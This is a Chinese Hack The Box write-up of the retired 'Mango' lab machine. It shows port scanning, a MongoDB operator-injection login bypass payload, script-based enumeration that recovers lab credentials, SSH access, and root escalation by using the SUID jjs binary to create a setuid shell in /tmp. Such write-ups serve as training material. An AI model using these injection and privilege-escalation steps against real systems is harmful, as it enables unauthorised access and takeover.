HACKTHEBOX通关笔记——mango(退役)

信息收集

端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sC -sV -A -p- --min-rate=10000 10.129.229.185
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-31 20:44 EST
Warning: 10.129.229.185 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.229.185
Host is up (0.23s latency).
Not shown: 65532 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_  256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp  open  http     Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
443/tcp open  ssl/http Apache httpd 2.4.29 ((Ubuntu))
| tls-alpn: 
|_  http/1.1
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after:  2020-09-26T14:21:19
|_http-server-header: Apache/2.4.29 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/31%OT=22%CT=1%CU=35063%PV=Y%DS=2%DC=I%G=Y%TM=65BA
OS:F820%P=x86_64-pc-linux-gnu)SEQ()SEQ(SP=107%GCD=1%ISR=10B%TI=Z%TS=A)SEQ(S
OS:P=107%GCD=1%ISR=10B%TI=Z%CI=Z%TS=A)SEQ(SP=107%GCD=1%ISR=10B%TI=Z%CI=Z%II
OS:=I%TS=C)OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7
OS:%O5=M53CST11NW7%O6=M53CST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%
OS:W6=7120)ECN(R=N)ECN(R=Y%DF=Y%T=40%W=7210%O=M53CNNSNW7%CC=Y%Q=)T1(R=N)T1(
OS:R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=N)T4(R=Y%DF=Y%T=4
OS:0%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=N)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O
OS:=%RD=0%Q=)T6(R=N)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=N)T7(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=N)U1(R=Y%DF=N%T=40%IPL=16
OS:4%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=N)IE(R=Y%DFI=N%T=40%CD=S)Network Distance: 2 hops
Service Info: Host: 10.129.229.185; OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 143/tcp)
HOP RTT    ADDRESS
1   ... 30OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 188.51 seconds

通过扫描端口发现开放端口为80、443、22,且443端口下存在commonName=staging-order.mango.htb,将该域名加入hosts

┌──(root㉿kali)-[~]
└─# cat /etc/hosts
127.0.0.1       localhost
127.0.1.1       kali
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters
10.129.229.185  staging-order.mango.htb

访问https://staging-order.mango.htb

访问http://staging-order.mango.htb

漏洞利用

抓包简单爆破用户名

爆破发现返回结果都是200,没有可利用信息,根据名称猜测可能是mangodb数据库。

发现一篇文章,为mangodb注入(https://www.ddosi.org/b292/)

mangodb数据库存在基本的身份验证绕过,攻击这可以尝试在字段值中输入MongoDB运算符,如$eq(等于),$ne(不等于)或$gt(大于)。这是在PHP应用程序中使用直接从表单获取参数值的方式来构建数据库查询的不安全方法:

$query = array("user" => $_POST["username"], "password" => $_POST["password"]);

如果此查询随后用于检查登录凭据,则攻击者可以滥用PHP的内置关联数组处理来注入始终返回true并绕过身份验证过程的MongoDB查询。

基于此我们可以在数据包中加入mangodb运算符尝试mangodb注入。

username[$ne]=toto&password[$regex]=.{1}

返回包出现一个home.php,访问看下

访问得到一个邮箱admin@mango.htb

在github看到一个脚本,可用于枚举存在mangodb注入的账号密码

https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
# python3 nosqli-user-pass-enum.py                        
usage: nosqli-user-pass-enum.py [-h] [-u URL] [-up parameter] [-pp parameter] [-op parameters] [-ep parameter] [-m Method]options:-h, --help      show this help message and exit-u URL          Form submission url. Eg: http://example.com/index.php-up parameter   Parameter name of the username. Eg: username, user-pp parameter   Parameter name of the password. Eg: password, pass-op parameters  Other paramters with the values. Separate each parameter with a comma(,). Eg: login:Login, submit:Submit-ep parameter   Parameter that need to enumerate. Eg: username, password-m Method       Method of the form. Eg: GET/POST
NoneExample: python nosqli-user-pass-enum.py -u http://example.com/index.php -up username -pp password -ep username -op login:login,submit:submit -m POST

使用脚本进行爆破

┌──(root㉿kali)-[/redteam/mangodb/mongodb/mongodb]
└─# python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -op login:login -ep password -m POST
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
No pattern starts with 'a'
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
Pattern found that starts with 'h'
Pattern found: h3
Pattern found: h3m
Pattern found: h3mX
Pattern found: h3mXK
Pattern found: h3mXK8
Pattern found: h3mXK8R
Pattern found: h3mXK8Rh
Pattern found: h3mXK8RhU
Pattern found: h3mXK8RhU~
Pattern found: h3mXK8RhU~f
Pattern found: h3mXK8RhU~f{
Pattern found: h3mXK8RhU~f{]
Pattern found: h3mXK8RhU~f{]f
Pattern found: h3mXK8RhU~f{]f5
Pattern found: h3mXK8RhU~f{]f5H
password found: h3mXK8RhU~f{]f5H
No pattern starts with 'i'
No pattern starts with 'j'
No pattern starts with 'k'
No pattern starts with 'l'
No pattern starts with 'm'
No pattern starts with 'n'
No pattern starts with 'o'
No pattern starts with 'p'
No pattern starts with 'q'
No pattern starts with 'r'
No pattern starts with 's'
Pattern found that starts with 't'
Pattern found: t9
Pattern found: t9K
Pattern found: t9Kc
Pattern found: t9KcS
Pattern found: t9KcS3
Pattern found: t9KcS3>
Pattern found: t9KcS3>!
Pattern found: t9KcS3>!0
Pattern found: t9KcS3>!0B
Pattern found: t9KcS3>!0B#
Pattern found: t9KcS3>!0B#2
password found: t9KcS3>!0B#22 password(s) found:
h3mXK8RhU~f{]f5H
t9KcS3>!0B#2

得到两个密码,再次使用脚本枚举下用户名
 

┌──(root㉿kali)-[/redteam/mangodb/mongodb/mongodb]
└─# python3 nosqli-user-pass-enum.py -u http://staging-order.mango.htb/ -up username -pp password -op login:login -ep username -m POST
No pattern starts with '0'
No pattern starts with '1'
No pattern starts with '2'
No pattern starts with '3'
No pattern starts with '4'
No pattern starts with '5'
No pattern starts with '6'
No pattern starts with '7'
No pattern starts with '8'
No pattern starts with '9'
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin
No pattern starts with 'b'
No pattern starts with 'c'
No pattern starts with 'd'
No pattern starts with 'e'
No pattern starts with 'f'
No pattern starts with 'g'
No pattern starts with 'h'
No pattern starts with 'i'
No pattern starts with 'j'
No pattern starts with 'k'
No pattern starts with 'l'
Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mango2 username(s) found:
admin
mango

由此可得到两个账号密码

admin:t9KcS3>!0B#2
mango:h3mXK8RhU~f{]f5H

尝试登录看看,登录web失败,记得端口扫描开放了22端口,登录ssh看看

使用mango账号成功登录ssh

┌──(root㉿kali)-[/redteam/mangodb/mongodb/mongodb]
└─# sshpass -p 'h3mXK8RhU~f{]f5H' ssh mango@10.129.229.185
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
​* Documentation:  https://help.ubuntu.com* Management:     https://landscape.canonical.com* Support:        https://ubuntu.com/advantage
​System information as of Fri Feb  2 05:09:54 UTC 2024
​System load:  0.0               Processes:           100Usage of /:   57.8% of 5.29GB   Users logged in:     0Memory usage: 14%               IP address for eth0: 10.129.229.185Swap usage:   0%
​
​* Canonical Livepatch is available for installation.- Reduce system reboots and improve kernel security. Activate at:https://ubuntu.com/livepatch
​
118 packages can be updated.
18 updates are security updates.
​
​
Last login: Mon Sep 30 02:58:45 2019 from 192.168.142.138
mango@mango:~$ whoami&&id
mango
uid=1000(mango) gid=1000(mango) groups=1000(mango)

在admin用户下发现user.txt,但权限不够,无法访问

mango@mango:/home$ ls
admin  mango
mango@mango:/home$ cd admin
mango@mango:/home/admin$ ls
user.txt
mango@mango:/home/admin$ cat user.txt
cat: user.txt: Permission denied

使用前面发现的另一个密码切换至admin用户

mango@mango:~$ su - admin
Password: 
$ whoami&&id
admin
uid=4000000000(admin) gid=1001(admin) groups=1001(admin)
$ /bin/bash -i
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.admin@mango:/home/admin$ cat user.txt
8b2e26139da12476c7d609ab50766c76

权限提升

查看suid文件

admin@mango:/home/admin$ find / -user root -perm -4000 2>/dev/null
/bin/fusermount
/bin/mount
/bin/umount
/bin/su
/bin/ping
/snap/core/7713/bin/mount
/snap/core/7713/bin/ping
/snap/core/7713/bin/ping6
/snap/core/7713/bin/su
/snap/core/7713/bin/umount
/snap/core/7713/usr/bin/chfn
/snap/core/7713/usr/bin/chsh
/snap/core/7713/usr/bin/gpasswd
/snap/core/7713/usr/bin/newgrp
/snap/core/7713/usr/bin/passwd
/snap/core/7713/usr/bin/sudo
/snap/core/7713/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7713/usr/lib/openssh/ssh-keysign
/snap/core/7713/usr/lib/snapd/snap-confine
/snap/core/7713/usr/sbin/pppd
/snap/core/6350/bin/mount
/snap/core/6350/bin/ping
/snap/core/6350/bin/ping6
/snap/core/6350/bin/su
/snap/core/6350/bin/umount
/snap/core/6350/usr/bin/chfn
/snap/core/6350/usr/bin/chsh
/snap/core/6350/usr/bin/gpasswd
/snap/core/6350/usr/bin/newgrp
/snap/core/6350/usr/bin/passwd
/snap/core/6350/usr/bin/sudo
/snap/core/6350/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6350/usr/lib/openssh/ssh-keysign
/snap/core/6350/usr/lib/snapd/snap-confine
/snap/core/6350/usr/sbin/pppd
/usr/bin/newuidmap
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/newgidmap
/usr/bin/run-mailcap
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/pkexec
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/jvm/java-11-openjdk-amd64/bin/jjs
/usr/lib/openssh/ssh-keysign
/usr/lib/snapd/snap-confine

在结果看到两个二进制文件run-mailcap和jjs

https://gtfobins.github.io/gtfobins/run-mailcap/
https://gtfobins.github.io/gtfobins/jjs/#suid

根据资料可得知run-mailcap和jjs程序可用于root身份执行命令,执行jjs并使用java的Runtime.Exec()函数生成一个shell

admin@mango:/home/admin$ jjs
Warning: The jjs tool is planned to be removed from a future JDK release
jjs> Java.type('java.lang.Runtime').getRuntime().exec('cp /bin/sh /tmp/sh').waitFor()
0
jjs> Java.type('java.lang.Runtime').getRuntime().exec('chmod u+s /tmp/sh').waitFor()
0 
admin@mango:/home/admin$ /tmp/sh -p
# id
uid=4000000000(admin) gid=1001(admin) euid=0(root) groups=1001(admin)
# whoami
root
# ls /root
root.txt
# cat /root/root.txt
30c7732f9b112a3f7cf812e3e2615928

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.hqwc.cn/news/459983.html

如若内容造成侵权/违法违规/事实不符,请联系编程知识网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

开关电源用什么电感

开关电源用什么电感 电感波形图 我们看图&#xff0c;如下图所示&#xff1a; 图1 电感波形示意图 PWM那张图和inductor那张图&#xff0c;第一张图就是Buck电路图SW引脚的波形&#xff0c;看波形我们知道在t1的时候是vi在t2的时候是0&#xff0c;紧接着电流和电压经过电感以…

【Godot4.2】文件系统自定义控件 - FileSystemTree

FileSystemTree B站【Godot4.2】文件系统自定义节点 - FileSystemTree 概述 在Godot设计编辑器插件或应用程序时&#xff0c;可能需要涉及文件系统的显示&#xff0c;比如文件夹或文件的树形列表。 我们可以用Godot的Tree控件快速书写相应的功能&#xff0c;但是为了复用到…

戴上HAUWEI WATCH GT 4,解锁龙年新玩法

春节将至&#xff0c;华为WATCH GT 4作为一款颜值和实力并存的手表&#xff0c;能为节日增添了不少趣味和便利。无论你是钟情于龙年表盘或定制属于自己的表盘&#xff0c;还是过年用来抢红包或远程操控手机拍全家福等等&#xff0c;它都能成为你的“玩伴”。接下来&#xff0c;…

【新书推荐】7.1 do while语句

本节必须掌握的知识点&#xff1a; 示例二十二 代码分析 汇编解析 ■do while语句其语法形式&#xff1a; do{ 语句块; }while(表达式) ■语法解析&#xff1a; ●执行do循环体内的语句块&#xff1b; ●判断while语句里的表达式&#xff0c;表达式为真继续下次循环&#…

【FPGA开发】Modelsim和Vivado的使用

本篇文章包含的内容 一、FPGA工程文件结构二、Modelsim的使用三、Vivado的使用3.1 建立工程3.2 分析 RTL ANALYSIS3.2.1 .xdc约束&#xff08;Constraints&#xff09;文件的产生 3.3 综合 SYNTHESIS3.4 执行 IMPLEMENTATION3.5 烧录程序3.6 程序固化3.6.1 SPI约束3.6.2 .bin文…

Java线程是怎么实现run方法的执行的呢?【 多线程在JVM中的实现原理剖析】

Java线程是怎么实现run方法的执行的呢&#xff1f;【 多线程在JVM中的实现原理剖析】 查看naive state0 方法JVM_StartThread 方法创建操作系统线程操作系统线程执行 本文转载-极客时间 我们知道Java线程是通过行start()方法来启动的&#xff0c;线程启动后会执行run方法内的代…

服务器安装Docker (centOS)

1. 卸载旧版本的Docker&#xff08;如果有&#xff09; 首先&#xff0c;如果您的系统上安装了旧版本的Docker&#xff0c;需要将其卸载。Docker的旧版本称为docker或docker-engine。使用以下命令来卸载旧版本&#xff1a; sudo yum remove docker \ docker-client \ docker-…

假期作业 6

1.C语言中&#xff0c;运算对象必须是整型数的运算符是 A 。 A、% B、/ C、%和/ D、* 2.若有关系x≥y≥z,应使用 A C语言表达式。 A、(x>y)&&(y>z) B、(x>y)AND(y>z) C、(x>y>z) D、(x>y)&(y>z) 3&…

Ubuntu安装SVN服务并结合内网穿透实现公网访问本地存储文件

&#x1f525;博客主页&#xff1a; 小羊失眠啦. &#x1f3a5;系列专栏&#xff1a;《C语言》 《数据结构》 《C》 《Linux》 《Cpolar》 ❤️感谢大家点赞&#x1f44d;收藏⭐评论✍️ 前些天发现了一个巨牛的人工智能学习网站&#xff0c;通俗易懂&#xff0c;风趣幽默&…

C语言的循环结构

目录 前言 1.三种循环语句 1.while循环 2.for循环 2.1缺少表达式的情况 3.do while循环 2.break语句和continue语句 2.1在while循环中 2.2在for循环中 2.3在do while 循环中 3.循环的嵌套 4.go to语句 前言 C语⾔是结构化的程序设计语⾔&#xff0c;这⾥的结构指的是…

自然语言处理(NLP)——使用Rasa创建聊天机器人

1 基本概念 1.1 自然语言处理的分类 IR-BOT&#xff1a;检索型问答系统 Task-bot&#xff1a;任务型对话系统 Chitchat-bot:闲聊系统 1.2 任务型对话Task-Bot:task-oriented bot 这张图展示了一个语音对话系统&#xff08;或聊天机器人&#xff09;的基本组成部分和它们之间的…

C# 实现微信自定义分享

目录 需求与调整 代码实现 获取令牌 生成合法票据 获取有效签名 客户端准备 客户端实现 小结 需求与调整 在微信中打开网页应用后&#xff0c;可以选择将地址发送给朋友进行分享&#xff0c;如下图&#xff1a; 在实际的应用中&#xff0c;我们可能不是简单的将该网页…